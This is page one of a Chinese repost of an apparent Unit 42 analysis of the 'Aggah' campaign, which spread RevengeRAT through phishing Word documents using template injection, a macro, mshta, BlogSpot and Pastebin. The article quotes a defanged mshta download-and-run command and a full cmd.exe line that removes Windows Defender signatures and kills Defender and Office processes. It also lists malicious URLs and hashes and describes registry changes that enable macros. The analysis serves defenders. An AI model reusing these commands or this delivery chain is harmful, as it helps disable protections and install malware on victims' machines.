欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

利用钓鱼邮件传播RevengeRAT的Aggah行动

来源:本站整理 作者:佚名 时间:2019-04-28 TAG: 我要投稿

2019年3月,Unit 42开始着手研究一起主要针对中东国家的攻击行动。研究分析表明,此项行动可能只是一起更大规模攻击行动的前奏,其目标涉及美欧亚三大洲。
此次攻击行动主要通过鱼叉式网络钓鱼邮件进行传播的,邮件携带了一个附件,在用户打开后,附件会通过模板注入从远程服务器加载一个启用了宏的恶意文件,而此文件又会指向BlogSpot来获取恶意脚本,并通过该脚本从Pastebin上下载最终有效负载——RevengeRAT恶意软件。在研究过程中,我们发现了有好几类传播的文档,虽然内容可能有所出入,但都遵循相同的流程,最后都是在用户机器上安装了在Pastebin上托管的RevengeRAT,这表明威胁行为者在整个攻击活动中的TTP(战术、技术和过程)是不变的。
最初,我们推测此项行动可能与Gorgon组织有关,理由有两个:一个是高水平的TTP,二是对RevengeRAT恶意软件的使用。但我们当前还无法获得一些更确定性的指标与Gorgon组织相匹配,尚且无法将其归因于Gorgon组织。
于是我们决定将此项行动称为Aggah行动,“Aggah”这个名称来源于Pastebin上一个托管RevengeRAT payload的账户名,也是用于分割发送到RevengeRAT C2服务器的数据的分隔符。
传播过程
我们对Aggah行动的研究始于2019年3月27日获取的一封文件,此文件通过电邮的方式发送到了某个中东国家的组织机构手里。这封邮件冒充本国一家大型金融机构的身份,告知用户的“账户被锁定了”。最初,这封文件只出现在了一个国家,在教育、媒体/营销和政府垂直部门的机构中出现比率最高,而在四天后的3月31日,我们看到同样的邮件被发送到了第二个中东国家的某家金融机构。后来随着时间的推移,更多踪迹逐渐浮出水面,此次行动不仅仅针对中东地区,美国、欧洲和亚洲的多个组织机构也同样出现了这份文件的身影,且攻击者针对的目标是教育、媒体、技术、零售、制造、州/地方政府、酒店、医疗等行业。由于文件在功能上是相似的,所以我们将描述之前分析的原始样本。
3月27日发送的电子邮件中附带一个Word文档,文件名为“Activity.doc”(SHA256:d7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946),打开后会试图通过模板注入加载远程OLE文档,具体过程如下:当打开“Activity.doc”时,会显示图1,诱导用户启用宏,启动条件必须是桌面版本的Microsoft Word,因为宏在Office 365的Word的联机版本中不起作用。“Activity.doc”文件本身不包含宏,但从远程服务器加载的OLE文包含了一个宏。

图1. Activity.doc中用于诱导用户启用宏的截图
Activity.doc分析
此文档使用模板注入来加载托管在远程服务器上的文件。图2显示了文档页脚的内容,它会从hxxps://static.wixstatic [.] com / ugd / 05e470_b104c366c1f7423293887062c7354db2.doc处加载远程OLE文档:

图2.Activity.doc文档页脚,显示了远程OLE文件所在地
加载的OLE文件实际上是一个RTF文件(SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f),它使用一个经过混淆的宏加载嵌入的Excel文档,宏里包含了大量“垃圾”代码。这个宏的目的是通过“Shell”命令解码并执行下列URL内容:
mshta hxxp://www.bitly[.]com/SmexEaldos3
上面的命令使用了内置的“mshta”应用程序来下载URL所提供的内容,URL是用Bit.ly生成的短链接。由WildFire解析后,短链接会重定向到hxxps://bjm9.blogspot [.] com / p / si.html,如图3中HTTP响应的“Location”字段所示。

图3.短链接,指向Blogspot
图4展示了链接指向的内容,一篇看起来有点奇怪的BlogSpot文章。

图4.bjm9.blogspot (.]com屏幕截图
通过分析博客上的代码,我们发现它实际上包含了一个JavaScript脚本,如图5所示。

图5.嵌入的JavaScript脚本
恶意脚本在植入系统后可执行多个活动。首先,它会试图通过删除签名集来阻止Microsoft Defender。该脚本还能杀死Defender进程以及一些Office应用程序的进程。所有这些都是使用以下命令行执行的:
cmd.exe /c cd “”%ProgramFiles%\Windows Defender”” & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c “”taskkill /f /im MSASCuiL.exe”” & forfiles /c “”taskkill /f /im MpCmdRun.exe”” & exit
接着该脚本会试图禁用Office产品中的安全机制,尤其是通过设置注册表项值来启用宏和禁用ProtectedView。启用Word、PowerPoint和Excel中的宏的操作是通过将某些注册表项(见附录)设置为值“1”来完成的。
禁用Word、PowerPoint和Excel中的ProtectedView安全机制则是将另一些注册表项(见附录)设置为“1”。
我们之前的博文中曾讲过Gorgon组织在Office中启用宏和禁用ProtectedView的技术,以及对注册表项顺序的修改。此外,此次行动中中止Windows Defender和Microsoft Office应用程序进程的策略也与Gorgon组织如出一辙,并且Gorgon在之前的攻击行动中也曾用bit.ly缩写URL的行为,虽然存在明显的技术重叠,但仍然缺乏具体的证据表明这次攻击活动与Gorgon有关。托管在Blogspot上的脚本主要执行三个活动,包括:

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.ylxj.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载